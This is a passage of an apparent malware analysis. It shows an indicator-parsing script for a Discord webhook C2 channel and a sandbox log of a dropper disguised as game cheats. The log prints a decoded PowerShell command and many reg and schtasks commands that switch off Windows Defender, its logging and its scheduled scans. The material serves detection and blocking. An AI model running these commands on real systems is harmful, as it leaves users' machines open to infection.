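    m = WEBHOOK.match(url)
    if not m:
        return None
    wid = int(m.group(1))
    return {
        "url": url,
        "webhook_id": wid,
        "token": m.group(2),
        "created_utc": snowflake_time(wid),
        # Host-independent path prefix: blocks this webhook on either host without
        # blocking Discord as a whole.
        "url_path_indicator": f"/api/webhooks/{wid}/",
    }


def indicators_from_config(config_text: str):
    """Parse the extractor's JSON and return the normalized C2 indicator (or None)."""
    cfg = json.loads(config_text)
    return parse_webhook(cfg["C2 url"])


if __name__ == "__main__":
    ioc = indicators_from_config(CONFIG_TEXT)
    print(f"webhook id {ioc['webhook_id']} created {ioc['created_utc']:%Y-%m-%d %H:%M:%S}Z")
    print("block path prefix:", ioc["url_path_indicator"])
```

Because the C2 channel rides on Discord's own infrastructure, blocking the domain or the IP is not a realistic option; the path prefix is what a proxy or EDR network rule can key on, and reporting the webhook to Discord is what actually closes the channel. The derived creation time (July 2024 for this ID) is useful for timelining when the campaign's infrastructure was set up, independent of when the sample was first seen.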

System Summary

Source: wKj1CBkbos.exe, type: SAMPLE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | File created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
Source: Lunch LaCheat.exe.6.dr | Static PE information: .vmp0 and .vmp1 section names
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe 10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe 2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
Source: wKj1CBkbos.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: wKj1CBkbos.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Primordial Crack.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: wKj1CBkbos.exe, 00000000.00000002.2187239818.000000000141E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.000000000141E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.00000000013E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe | Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: wKj1CBkbos.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 52cheatand52rat.exe.0.dr, --------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
The string decodes to a PowerShell command that turns off Defender's intrusion prevention, IOAV, real-time and script scanning, disables controlled folder access, sets network protection to audit-only, and stops cloud (MAPS) reporting and sample submission: Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: 52cheatand52rat.exe.0.dr, --------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 52cheatand52rat.exe.0.dr, --------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@113/6@1/1
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Mutant created: \Sessions\1\BaseNamedObjects\kwtxO2R822Z9ihsGdQrR
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | File created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: wKj1CBkbos.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: wKj1CBkbos.exe | ReversingLabs: Detection: 95%
Source: unknown | Process created: C:\Users\user\Desktop\wKj1CBkbos.exe "C:\Users\user\Desktop\wKj1CBkbos.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /DisableJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /DisableJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
